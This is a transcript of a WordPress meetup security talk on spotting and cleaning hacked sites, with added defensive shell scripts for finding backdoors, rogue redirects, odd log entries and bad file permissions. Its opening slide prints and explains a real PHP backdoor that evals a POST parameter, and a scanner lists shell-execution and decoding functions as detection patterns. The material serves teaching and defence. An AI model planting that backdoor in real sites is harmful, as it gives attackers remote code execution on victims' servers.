security presentation for boulder wordpress meetup
TRANSCRIPT
YOUR SITE IS AND IS NOT HACKED
@ASKWPGIRL
SCHRODINGER’S WEBSITE
You must assume your site is both hacked and not hacked until you open the box and find out.
<?php $qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['q53b3a6'])){eval(${$s20}['q53b3a6']);}?>
(A real backdoor one-liner: the letters of "stop_" are reordered and uppercased into "_POST", so ${$s20} is $_POST, and whatever an attacker sends in the q53b3a6 parameter goes straight into eval().)
WordPress Instructor and Custom Theme Developer
Using WordPress Since 2007 — Version 2.2
Not a security expert, but I play one on WordPress.tv
Angela Bowman
Ask WP Girl @askwpgirl
1 - WHAAA?
WHY DO HACKERS HACK?
Deface sites for fun
Add spammy links to bad web neighborhoods (SEO spam)
Hijack site to add spam, porn, gambling, pay-day loans content
Steal sensitive information to sell
Distribute malware to personal computers
Use server resources for distributed attacks
WHAT DO HACKERS ACTUALLY DO?
Create new accounts with admin privileges
Reset passwords of multiple accounts
Inject malicious code into content
Add malicious code to existing files or new files
Redirect your website by editing .htaccess file
http://www.wpmayor.com/wordpress-security-based-facts-statistics/
WHY SHOULD YOU CARE?
Your site can start running really slow
Your SEO could take a nose dive
Your site could be blacklisted or taken down by your web host
Your site could be added to the Phish Tank which is hard to get out of
You could be sued by customers for damages
Your site can become unusable
TYPICALLY, ONLY THE MOST SEVERELY HACKED SITES WILL BE BLACKLISTED OR SUSPENDED BY HOST
Many hacks are hidden
WHY ARE WORDPRESS SITES VULNERABLE?
PHP and MySQL make it easy to write insecure code that still works, so a lot of it gets shipped
Current WordPress core is very secure when kept up to date; the weak spots are around it (see the stats below)
Themes and plugins not all created equal
Hosting security varies
Login credentials can be compromised
Personal computer may be infected
HACK STATS
41% Hosting
29% Themes
22% Plugins
8% Weak Passwords
RECENT VULNERABILITIES
Google Analytics
WordPress 4.2.1
Backup to Dropbox
FancyBox
TwentyFifteen
Revolution Slider
Gravity Forms
JetPack
Database of all vulnerable plugins and themes: https://wpvulndb.com/
RECENT STATS
100,000+ WordPress sites compromised through Slider Revolution security vulnerability
800,000 banking credentials stolen using hacked WordPress sites
600,000 WordPress websites compromised through FancyBox plugin security vulnerability
http://www.databreachtoday.com/hackers-grab-800000-banking-credentials-a-7416
http://wptavern.com/hackers-hijack-fancybox-plugin-to-deface-wordpress-sites-with-isis-propaganda
LOW HANGING FRUIT
Vulnerabilities immediately published on the web
Hackers write bots to exploit vulnerabilities
Website owners are oblivious: they don't update, use weak passwords, install tons of plugins, and use poor web hosting
2 - COMMON EXPLOITS AND HOW TO FIX
1 - Backdoors: PHP files uploaded to your server and accessed remotely. Severely affect site and server performance. Not easy to find.
"It's very common that backdoors don't have any visible signs in the site code and it's impossible to detect them by accessing the infected site from outside." ~ Sucuri
Removing Backdoors
Check WordPress core integrity using Sucuri plugin https://wordpress.org/plugins/sucuri-scanner/
Delete and reinstall WordPress core files, plugins, and themes
Check wp-content and uploads folder carefully for hacked PHP files
Run https://wordpress.org/plugins/gotmls/ to check for hacked files in the wp-content folder
Gravity Forms hack: which of these files is not like the others?
DIY HACK RECOVERY
Via SFTP (preferred) or FTP
1 Backup: Download everything. Good to examine later for details of the hack if needed.
2 Delete all except: cgi-bin, .htaccess, wp-config.php (examine these)
3 Upload fresh: WordPress, themes, plugins, cleaned uploads
Hmmmm? PHP in a CSS folder?
Look for modified dates
Look for unusual names
Compare file list to original download
Look for file types that don’t belong
Check commonly hacked files: .htaccess, wp-config.php, index.php, functions.php, header.php
Any file can be hacked!
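The checklist above as a shell triage script, added here as an example; it is not part of the talk or of any plugin it names. It assumes a POSIX shell with find, grep -E, diff and cmp, that uploads, css, js, images and fonts folders never legitimately hold PHP, a 30-day modified window, and the pattern list shown. Every hit is a file to open and read, not a verdict: WordPress core itself calls base64_decode in a few places, so the second check always needs a human.

```sh
# Added example, not from the slides. Print "reason<TAB>path" for each PHP
# file under $1 that deserves a look; $2 is the modified-date window in days.
wp_backdoor_scan() {
  root=$1
  days=${2:-30}   # assumption: a site nobody touched for months should have no fresh PHP

  # 1. PHP where only media or assets belong (the "PHP in a CSS folder?" case).
  find "$root" -type f \( -name '*.php' -o -name '*.phtml' -o -name '*.php5' \) \
       \( -path '*/uploads/*' -o -path '*/css/*' -o -path '*/js/*' \
          -o -path '*/images/*' -o -path '*/fonts/*' \) 2>/dev/null |
    while IFS= read -r f; do printf 'php-in-asset-dir\t%s\n' "$f"; done

  # 2. Constructs typical of obfuscated backdoors: eval/assert, decoders,
  #    variable-variables such as ${$s20} (the slide's sample builds "_POST"
  #    from "stop_" and evals $_POST['q53b3a6']), and shell execution.
  find "$root" -type f \( -name '*.php' -o -name '*.phtml' -o -name '*.php5' \) \
       -exec grep -lE \
         'eval[[:space:]]*\(|assert[[:space:]]*\(|base64_decode[[:space:]]*\(|gzinflate[[:space:]]*\(|str_rot13[[:space:]]*\(|\$[{]\$|preg_replace[[:space:]]*\(.*/e|(system|shell_exec|passthru|popen)[[:space:]]*\(' \
         {} + 2>/dev/null |
    while IFS= read -r f; do printf 'suspicious-code\t%s\n' "$f"; done

  # 3. PHP changed inside the window ("look for modified dates").
  find "$root" -type f -name '*.php' -mtime "-$days" 2>/dev/null |
    while IFS= read -r f; do printf 'recently-modified\t%s\n' "$f"; done
}

# Compare the site ($2) with a fresh download of the same WordPress version
# ($1): core directories, root-level core files, and root-level PHP that only
# exists on the site (db12.php and friends). wp-config.php is site-specific
# and is skipped; examine it by hand.
wp_core_diff() {
  fresh=$1
  site=$2
  for d in wp-admin wp-includes; do
    diff -rq "$fresh/$d" "$site/$d" || :
  done
  for f in "$fresh"/*.php; do
    name=$(basename "$f")
    if [ -f "$site/$name" ]; then
      cmp -s "$f" "$site/$name" || echo "Files $f and $site/$name differ"
    else
      echo "Missing in site: $name"
    fi
  done
  for f in "$site"/*.php; do
    name=$(basename "$f")
    case $name in wp-config.php) continue ;; esac
    [ -f "$fresh/$name" ] || echo "Only in site: $name"
  done
}
```

Run wp_backdoor_scan on the copy you downloaded in step 1 of the DIY recovery (so nothing on the live server changes), and wp_core_diff against a fresh download of exactly the version the site reports; "Only in site" and "differ" lines are the ones to open first.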
2 - Drive-by Downloads: Script injected into the website generates links to malware sites or pushes malware from your site to visitors' computers. Easy for scanners to detect.
Cleaning up Drive-by Downloads
Use Sucuri Sitecheck to scan site; read about hack
Disable JavaScript before visiting your site; you don't want to infect your own computer while checking it.
Remove hacked code from content or files.
Commonly hacked core files: index.php and wp-blog-header.php
Commonly hacked theme files: index.php, functions.php, header.php, footer.php
Monitor site
3 - Pharma Hack: Spam links injected into web pages, visible only to search engines. Difficult to scan for because cloaked.
Cleaning up Pharma Hack
Use http://www.botsvsbrowsers.com/SimulateUserAgent.asp to view the site as different devices and crawlers to find the hack
Search your site with Google: site:yoursitename.com
Same clean up as Drive-by Downloads
Can be cross-infected from other sites on the same server/hosting account
Read this: https://blog.sucuri.net/2011/02/cleaning-up-an-infected-web-site-part-i-wordpress-and-the-pharma-hack.html
4 - Malicious Redirects: Redirects traffic from your website to another, typically by modifying the .htaccess file, sometimes only when viewed by a particular device or browser, like a phone
Hacked .htaccess file
Finding and Removing Malicious Redirects
When someone tells you they tried to visit your site and couldn't, find out which browser or device they were using at the time.
Use http://www.botsvsbrowsers.com/SimulateUserAgent.asp to verify
Scan with Sucuri’s SiteCheck
Check all the .htaccess files on the server and remove the redirect.
https://sitecheck.sucuri.net/
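Two helpers for the redirect hunt, added as an example and not part of the talk. The first reads every .htaccess under a directory and reports rules that send visitors to another host, printing the preceding RewriteCond when the rule is keyed on the user agent or referrer (the cloaked, phone-only case). The second fetches a URL as a desktop browser, a phone and Googlebot with curl, arriving from a Google referrer, and prints the status and redirect target for each, which does from the command line what the SimulateUserAgent page does. The user-agent strings and the directive list are assumptions.

```sh
# Added example, not from the slides. Print "file:line: directive" for every
# .htaccess rule under $1 that points at an http(s) URL; a RewriteCond on the
# user agent or referrer in front of it is printed first.
wp_htaccess_redirects() {
  root=$1
  find "$root" -name .htaccess -type f 2>/dev/null | while IFS= read -r f; do
    awk -v file="$f" '
      # a condition on who the visitor is: remember it until the next rule
      tolower($0) ~ /^[[:space:]]*rewritecond[[:space:]]+%[{]http_(user_agent|referer)[}]/ { cond = NR ": " $0; next }
      tolower($0) ~ /^[[:space:]]*rewritecond[[:space:]]/ { next }   # other conditions keep the chain open
      tolower($0) ~ /^[[:space:]]*(#|$)/ { next }                     # comments and blank lines too
      tolower($0) ~ /^[[:space:]]*(rewriterule|redirect|redirectmatch|redirectpermanent|errordocument)[[:space:]]/ {
        if ($0 ~ /https?:\/\//) {
          if (cond != "") print file ":" cond
          print file ":" NR ": " $0
        }
        cond = ""
        next
      }
      { cond = "" }
    ' "$f"
  done
}

# Fetch $1 as three different clients and show where each lands. Needs network
# access, so it is not exercised by the offline checks; -L is deliberately
# absent so the redirect target is shown rather than followed.
wp_ua_probe() {
  url=$1
  for ua in \
    'Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0' \
    'Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F70' \
    'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'
  do
    printf '%s\n  -> ' "$ua"
    curl -s -o /dev/null -A "$ua" -e 'https://www.google.com/' \
         -w '%{http_code} %{redirect_url}\n' "$url"
  done
}
```

A legitimate www-to-bare-domain redirect will also show up in wp_htaccess_redirects; what you are looking for is a target you do not own, especially one that only fires after a HTTP_USER_AGENT or HTTP_REFERER condition.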
Why are people from Thailand and Romania accessing a strangely named PHP file somewhere?
Check raw access logs via cPanel
db12.php, css.php, dirs35.php????
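Reading the raw access log the way the slide suggests, as an added example that is not the speaker's material: a combined-format Apache log is reduced to requests for PHP files that are not normal WordPress entry points, grouped by method and path with the number of distinct client IPs, plus a helper that lists which IPs called one path. The allow-list of entry points is an assumption; plugins that expose their own PHP endpoints need adding to it.

```sh
# Added example, not from the slides. Summarise PHP requests in a combined
# format access log ($1) that are not ordinary WordPress entry points.
# Output: "hits<TAB>distinct IPs<TAB>METHOD /path", busiest first.
wp_log_odd_php() {
  awk '
    {
      # combined format: ip - - [date tz] "METHOD path HTTP/x" status size "ref" "ua"
      ip = $1; method = $6; path = $7
      sub(/^"/, "", method); sub(/\?.*/, "", path)      # drop the query string
      if (path !~ /\.php(\/|$)/) next
      # assumption: these are the only PHP files a browser should hit directly
      if (path ~ /^\/(index|wp-login|wp-cron|xmlrpc|wp-comments-post|wp-signup|wp-trackback|wp-activate)\.php$/) next
      if (path ~ /^\/wp-admin\//) next
      key = method " " path
      hits[key]++
      if (!((key, ip) in seen)) { seen[key, ip] = 1; ips[key]++ }
    }
    END { for (k in hits) printf "%d\t%d\t%s\n", hits[k], ips[k], k }
  ' "$1" | sort -rn
}

# Who is calling one path ($1) in log $2: "count<TAB>ip", busiest first.
# Feed the IPs to whois or a geolocation lookup to answer the "Thailand and
# Romania" question.
wp_log_ips_for() {
  awk -v p="$1" '{ path = $7; sub(/\?.*/, "", path); if (path == p) print $1 }' "$2" |
    sort | uniq -c | sort -rn | awk '{ printf "%d\t%s\n", $1, $2 }'
}
```

A POST to a PHP file under wp-content/uploads or a theme's css folder, repeated from several addresses, is the backdoor being used; wp_log_ips_for then tells you who, and the timestamps tell you since when.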
MONITORING TIPS
Use Google Search Console!
Google Webmaster Tools/Search Console:
Search Queries – you can spot queries irrelevant to your site.
Links to Your Site – you can find suspicious incoming links here.
Internal Links – this report can help reveal rogue sections of your site.
http://askwpgirl.com/submitting-wordpress-site-google-webmaster-tools/
Check for rogue users and posts
Your new admin friends?
Find hidden admin users: http://snipe.net/2010/01/when-wordpress-gets-hacked/
Audit Activity on Site
https://wordpress.org/plugins/wp-simple-firewall/
IMMEDIATELY CHANGE PASSWORDS
Use Sucuri plugin to Generate New Security Keys
Reset all passwords, including WordPress users, FTP, web hosting, control panel
Scan computer for viruses!
See http://askwpgirl.com/nuke-it-from-orbit/ for step-by-step elimination
CLEAN UP “BAD” HACK
If hackers got admin access to the site or database, you might have to nuke the entire site from orbit — it’s the only way to be sure
https://www.youtube.com/watch?v=aCbfMkh940Q
Or contact sucuri.net for
site clean up and monitoring
REQUEST SITE REVIEW
If Google blacklisted your site or marked it for phishing, you will need to request a review after you are certain you’ve cleaned up all hacked files:
https://support.google.com/webmasters/answer/168328?hl=en
3 - SECURITY BASICS
UPDATE UPDATE UPDATE
Timely updates are critical for security. Tools: iControlWP, InfiniteWP, Jetpack, ManageWP
http://askwpgirl.com/updating-wordpress-plugins-themes-core/
UPDATING PREMIUM THEMES AND PLUGINS
Often a manual process: download and FTP the new files
Bundled plugins (those shipped inside a theme) are not supported or auto-updated
Enter license key/purchase code in settings to receive updates
http://askwpgirl.com/updating-wordpress-plugins-themes-core/
SECURE YOUR LOGIN
Online generator: http://www.pctools.com/guides/password/
Track passwords: http://agilebits.com/products/1Password
Enable two-factor authentication: http://askwpgirl.com/wordpress-two-factor-authentication-plugins/
RUN A TIGHT SHIP!
Delete ALL unused stuff on server
Only use popular and well-maintained themes and plugins
Don’t allow users to register (Settings > General)
Always hold comments for moderation and use spam filtering (Akismet plugin)
GOOD HOSTING
Correct File Permissions
WordPress Auto Updates
Firewall and Scanning
Regular Backups
Server Security
Performance Optimization
Managed WordPress hosts: SiteGround, WP Engine, Get Flywheel, WebSynthesis, Pantheon
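The "correct file permissions" item above, as an added example that is not from the talk or any host's documentation: an audit of a WordPress tree against the common baseline of 755 for directories, 644 for files and 600 for wp-config.php (640 is also accepted), with world-writable entries called out separately, plus a function that applies the baseline. The baseline assumes PHP runs as the user that owns the files (suPHP, a per-site PHP-FPM pool); on a host where the web server runs as a different user, follow the host's guidance instead of this script.

```sh
# Added example, not from the slides. Print "reason<TAB>path" for everything
# under $1 that deviates from the 755/644/600 baseline.
wp_perm_audit() {
  root=$1
  # World-writable anything is the urgent case: any other account on a shared
  # host can plant files there.
  find "$root" -perm -o+w \( -type f -o -type d \) 2>/dev/null |
    while IFS= read -r p; do printf 'world-writable\t%s\n' "$p"; done
  find "$root" -type d ! -perm 755 2>/dev/null |
    while IFS= read -r p; do printf 'dir-not-755\t%s\n' "$p"; done
  find "$root" -type f ! -name wp-config.php ! -perm 644 2>/dev/null |
    while IFS= read -r p; do printf 'file-not-644\t%s\n' "$p"; done
  # wp-config.php holds the database password and the security keys.
  find "$root" -maxdepth 1 -name wp-config.php -type f ! -perm 600 ! -perm 640 2>/dev/null |
    while IFS= read -r p; do printf 'wp-config-not-600\t%s\n' "$p"; done
}

# Apply the baseline to the tree under $1.
wp_perm_fix() {
  root=$1
  find "$root" -type d -exec chmod 755 {} +
  find "$root" -type f -exec chmod 644 {} +
  if [ -f "$root/wp-config.php" ]; then
    chmod 600 "$root/wp-config.php"
  fi
}
```

Run wp_perm_audit first and read the list; a 777 uploads directory that a plugin "needed" is exactly how a backdoor ends up in wp-content/uploads.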
EFFECTIVE SECURITY PLUGIN FEATURES
Limit login access
Block bad URL requests with a Firewall
Audit activity
Security through obscurity is not security
Blocking individual IP addresses is not a foundation for a WordPress security policy: attackers rotate through botnets and proxies, so the address changes while the attack continues
My favorite security plugin: https://wordpress.org/plugins/wp-simple-firewall/
Does all the above and more. Will notify you of vulnerable plugins.
BACKUPS
Common wisdom is to back up your site
Backups are to your site what major medical coverage is to your health
Usually only helpful in case of a disaster
Services: VaultPress and WorpDrive are good hosted solutions!
Plugins: BackupBuddy (paid), BackWPup, Duplicator
SECURE YOUR COMPUTER
Scan for viruses and trojans
Be careful about downloading stuff!!!!
RESOURCES
http://snipe.net/2010/01/when-wordpress-gets-hacked/
https://support.google.com/webmasters/answer/163633?rd=1 ***
http://aw-snap.info/articles/find-backdoor.php
http://codex.wordpress.org/FAQ_My_site_was_hacked
http://sucuri.net - free scan, hack recovering, site monitoring, great posts on how to clean up specific hacks
http://askwpgirl.com/nuke-it-from-orbit
https://www.icontrolwp.com/2014/05/wordpress-security-simple-firewall-plugin-part-4-login-protection-feature/
https://www.icontrolwp.com/2014/06/beware-new-security-theat-wordpress-misinformation-virus/
About the banking hack: https://www.proofpoint.com/es/node/327
Top 10 Web application security risks for developers: https://youtu.be/nuWR_HiBHYc
http://www.smashingmagazine.com/2012/10/four-malware-infections-wordpress/
CONTACT
facebook.com/askwpgirl
twitter.com/askwpgirl
http://askwpgirl.com
http://boulderdigitalarts.com
One-on-One consulting third Friday of every month at Boulder Digital Arts
Six-week theme customization course in Colorado and online.
SEO and Best Maintenance Tips Newsletter http://askwpgirl.com